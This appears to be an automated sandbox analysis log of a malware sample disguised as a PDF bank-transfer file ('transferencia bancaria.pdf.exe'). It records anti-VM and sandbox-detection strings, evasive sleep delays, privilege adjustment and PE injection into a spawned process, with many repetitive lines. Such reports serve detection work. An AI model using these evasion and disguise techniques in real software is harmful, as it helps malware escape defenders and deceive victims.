Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 2372	Thread sleep time: -42186s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 6116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 5156	Thread sleep time: -300000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Thread delayed: delay time: 42186	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: transferencia bancaria.pdf.exe, 00000000.00000002.291185342.000000000445F000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.295985554.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: HoR6YLHHGFsobhrR7rF
Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Memory written: C:\Users\user\Desktop\transferencia bancaria.pdf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Process created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Users\user\Desktop\transferencia bancaria.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
